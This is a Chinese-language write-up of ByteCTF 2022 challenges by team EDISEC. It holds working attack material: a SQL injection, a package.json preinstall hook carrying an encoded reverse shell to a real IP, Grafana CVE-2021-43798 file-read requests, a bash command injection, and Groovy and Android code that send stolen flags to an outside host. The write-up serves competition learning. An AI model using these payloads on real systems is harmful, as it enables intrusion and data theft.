2022 ByteCTF By EDISEC

WriteUp 2年前 (2022) admin
974 0 0

EDI

JOIN US ▶▶▶

招新

EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。(诚招re crypto pwn misc方向的师傅)
有意向的师傅请联系邮箱[email protected][email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。

点击蓝字 ·  关注我们

01

Web

1

ctf_cloud

POST /users/signup HTTP/1.1Host: e0415807b2fc449027075f27a3cfe1e3.2022.capturetheflag.funUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101Firefox/83.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: application/jsonContent-Length: 59Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/Cookie: PHPSESSID=hftcgqq32s0or9hk89huvooo8p; connect.sid=s%3ApoFqQ8ErhSogbVMNdzwMcanbixoxlw3.l8FFINAquYbE9luPWO7uONwPJbat4BzzzG6W9GPCkswSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1{"username":"bcasd","password":"su',1),('admin','su',1)--"}
POST /dashboard/upload HTTP/1.1Host: e0415807b2fc449027075f27a3cfe1e3.2022.capturetheflag.funUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101Firefox/83.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryu3fv4Bf4rz9XvGktContent-Length: 330Origin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/Cookie:connect.sid=s%3A5zWp5eJF_cVlAadIxtC4gKiYlNG44Cs2.lDEXcfzsDuR7XUusa%2FMkld55S%2FNmj4uA%2FVZKIgXK0IwUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1------WebKitFormBoundaryu3fv4Bf4rz9XvGktContent-Disposition: form-data; name="c";filename="package.json"{"name": "userapp","version": "0.0.1","scripts": {"preinstall": "echoYmFzaCAtaSA+JiAvZGV2L3RjcC8xMjAuMjYuNTkuMTM3LzIzMzMgMD4mMQ==|base64 -d|bash"} }------WebKitFormBoundaryu3fv4Bf4rz9XvGkt--
POST /dashboard/dependencies HTTP/1.1Host: e0415807b2fc449027075f27a3cfe1e3.2022.capturetheflag.funUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101Firefox/83.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateOrigin: http://127.0.0.1Connection: closeReferer: http://127.0.0.1/Cookie:connect.sid=s%3A5zWp5eJF_cVlAadIxtC4gKiYlNG44Cs2.lDEXcfzsDuR7XUusa%2FMkld55S%2FNmj4uA%2FVZKIgXK0IwUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-Forwarded-For: 127.0.0.1X-Originating-IP: 127.0.0.1X-Remote-IP: 127.0.0.1X-Remote-Addr: 127.0.0.1Content-Type: application/jsonContent-Length: 48{"dependencies":{"su":"file:./public/uploads/"}}

2022 ByteCTF By EDISEC

2

easy_grafana

Grafana-CVE-2021-43798任意⽂件读取

GET /public/plugins/text/#/../../../../../../../../../..//etc/grafana/grafana.iniHTTP/1.1GET /public/plugins/text/#/../../../../../../../../../..//var/lib/grafana/grafana.dbHTTP/1.1

读配置⽂件得到secret_key:SW2YcwTIb9zpO1hoPsMm

2022 ByteCTF By EDISEC

使⽤这个的解密⽂件进⾏解密得到flag
GitHub - pedrohavay/exploit-grafana-CVE-2021-43798: This is a proof-of-concept exploit for Grafana'sUnauthorized Arbitrary File Read Vulnerability (CVE-2021-43798).
from secure import decryptimport base64secret_key = 'SW2YcwTIb9zpO1hoPsMm'ciphertext = 'b0NXeVJoSXKPoSYIWt8i/GfPreRT03fO6gbMhzkPefodqe1nvGpdSROTvfHK1I3kzZy9SQnuVy9c3lVkvbyJcqRwNT6/'encrypted = base64.b64decode(ciphertext.encode())pwdBytes, _ = decrypt(encrypted, secret_key)print(pwdBytes)

2022 ByteCTF By EDISEC

02

Misc

1

survey

签退

2022 ByteCTF By EDISEC

2

bash_game

⽐较漏洞,命令执⾏

2022 ByteCTF By EDISEC

exp
arr[$(cat /flag)]

然后让他报错就⾏了。

2022 ByteCTF By EDISEC

3

easy_groovy

def f = new File("/flag").textdef res1 = new URL('http://ip:1234/1'+f).text

2022 ByteCTF By EDISEC

4

signin

签到 直接/final签到 抓包爆破队伍名和id

2022 ByteCTF By EDISEC

5

find_it

看到scap,去搜了下,发现可以⽤sysdig分析,下载安装sysdig。

https://www.howtoing.com/how-to-monitor-your-ubuntu-16-04-system-with-sysdig/

使⽤-r参数读⽂件,并把分析的⽂件导出

2022 ByteCTF By EDISEC

然后去查findit.txt看看有什么操作。翻了很久发现上传了⼀个奇怪的php⽂件。

2022 ByteCTF By EDISEC

使⽤csysdig分析,发现有⼀个操作。传了⼀个nothing.png图⽚。

2022 ByteCTF By EDISEC

点进去能发现这个图⽚

2022 ByteCTF By EDISEC

这⾥使⽤010editor直接搜索,导出图⽚,是个⼆维码,扫描是flag的前半部分。这个php⽂件是flag的后半部分, 拼接起来是flag。

2022 ByteCTF By EDISEC

2022 ByteCTF By EDISEC

05

Pwn

1

Bronze Droid

和这个BabyAndroid⼀样,但是需要找到xss的替换 
https://forum.butian.net/share/1175

分析过程:

我们把给的apk⽂件⽤jadx-gui去解析下,第⼀步先看AndroidManifest.xml

2022 ByteCTF By EDISEC

然后看MainActivity,看来看去只有MainActivity ⾥⾯有个setResult函数可以

查到资料是这个 

https://erev0s.com/blog/exploiting-content-providers-through-an-insecure-setresult-implementation/

⾥⾯的内容⼏乎与资料的内容⼀致。原理是setResult函数在调⽤之后,会⾃动的调⽤onActivityResult()函数,我们只需要在攻击程序中重写 onActivityResult()函数即可,在⾥⾯写⼀个跳转,进⽽远程带出flag,exp参考BabyAndroid的。 

1.利⽤Android studio 创建项⽬,空⽩的项⽬即可 

2.包名要跟它规定的⼀样,也就是pwnbronzedroid。

3.在AndroidManifest.xml添加要申请的权限 这是我们要进⾏申请权限(由于⽬标是30版本,我们这⾥要多加个 android:usesCleartextTraffic=”true”,因为⾼版本是禁⽌使⽤明⽂流量的)这个在readme.md⾥⾯也有描述

2022 ByteCTF By EDISEC

4.我们利⽤传参的⽅式来写主要exp,通过exp的传参,跳转到⽬标的攻击类⾥(MainActivity),然后通过⽬标的 攻击类中的⾃动调⽤,将flag进⾏外带。 

5.魔改的onActivityResult⾥⾯写的主要是,我们进⾏获取远程的⼀个flag,并反弹到我们远程服务器上进⽽获取 flag 

攻击exp

package com.bytectf.pwnbronzedroid;
import android.app.Activity;import android.content.ContentValues;import android.content.Intent;import android.net.Uri;import android.os.Bundle;import android.provider.MediaStore;import android.util.Log;import android.widget.Toast;
import java.io.BufferedReader;import java.io.ByteArrayOutputStream;import java.io.InputStream;import java.io.InputStreamReader;import java.io.OutputStream;import java.net.InetSocketAddress;import java.net.Socket;import java.net.SocketAddress;
public class MainActivity extends Activity {// 参考 https://forum.butian.net/share/1175 @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); Intent intent = new Intent("ACTION_SHARET_TO_ME"); intent.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION | Intent.FLAG_GRANT_PREFIX_URI_PERMISSION | Intent.FLAG_GRANT_READ_URI_PERMISSION | Intent.FLAG_GRANT_WRITE_URI_PERMISSION); // 这里往后参考 https://erev0s.com/blog/exploiting-content-providers-through-an-insecure-setresult-implementation/ intent.setClassName("com.bytectf.bronzedroid", "com.bytectf.bronzedroid.MainActivity"); intent.setData(Uri.parse("content://com.bytectf.bronzedroid.fileprovider/root/data/data/com.bytectf.bronzedroid/files/flag")); startActivityForResult(intent,0); }

// 这部分参考 https://forum.butian.net/share/1175 对onActivityResult 进行魔改 protected void onActivityResult(int requestCode, int resultCode, Intent data) { super.onActivityResult(requestCode, resultCode, data); try { InputStream is = getContentResolver().openInputStream(data.getData()); BufferedReader br = new BufferedReader(new InputStreamReader(is)); StringBuilder sb = new StringBuilder(); String line; while ((line = br.readLine()) != null) { sb.append(line); } is.close(); br.close(); String flag = sb.toString(); new Thread(new Runnable() { @Override public void run() { try { if (true) { Socket sk = new Socket(); SocketAddress address = new InetSocketAddress("ip", 1235); sk.connect(address, 5000); sk.setTcpNoDelay(true); sk.setKeepAlive(true); OutputStream os = sk.getOutputStream(); os.write(flag.getBytes()); os.flush(); os.close(); sk.close(); Thread.sleep(1000); } } catch (Exception e) { Log.e("FlagHunter_Err",e.toString()); } } }).start(); } catch ( Exception e) { throw new RuntimeException(e); } }}
在服务器开⼀个http服务,提供下载apk。

2022 ByteCTF By EDISEC

下载1234端⼝的apk⽂件到远程链接,nc前半部分exp

from hashlib import *import itertoolsimport stringfrom Crypto.Hash import SHA256import itertoolsALPHABET = string.ascii_letters + string.digitssuffix = 'Zfecpd'digest = '5782089877f9ff411d7d6276df447eca181fc5a27dc3fadc5a0d68a0aa555581'print(f"suffix: {suffix}ndigest: {digest}")for i in itertools.product(ALPHABET,repeat=4):    prefix = ''.join(i)    guess =  suffix + prefix    if sha256(guess.encode()).hexdigest() == digest:        print(f"Find XXXX: {prefix}")        break

2022 ByteCTF By EDISEC

nc监听apk中写的1235端⼝,外带出flag

2022 ByteCTF By EDISEC

EDI安全

2022 ByteCTF By EDISEC

扫二维码|关注我们

一个专注渗透实战经验分享的公众号

原文始发于微信公众号(EDI安全):2022 ByteCTF By EDISEC

版权声明:admin 发表于 2022年9月26日 下午8:44。
转载请注明:2022 ByteCTF By EDISEC | CTF导航

相关文章

暂无评论

您必须登录才能参与评论!
立即登录
暂无评论...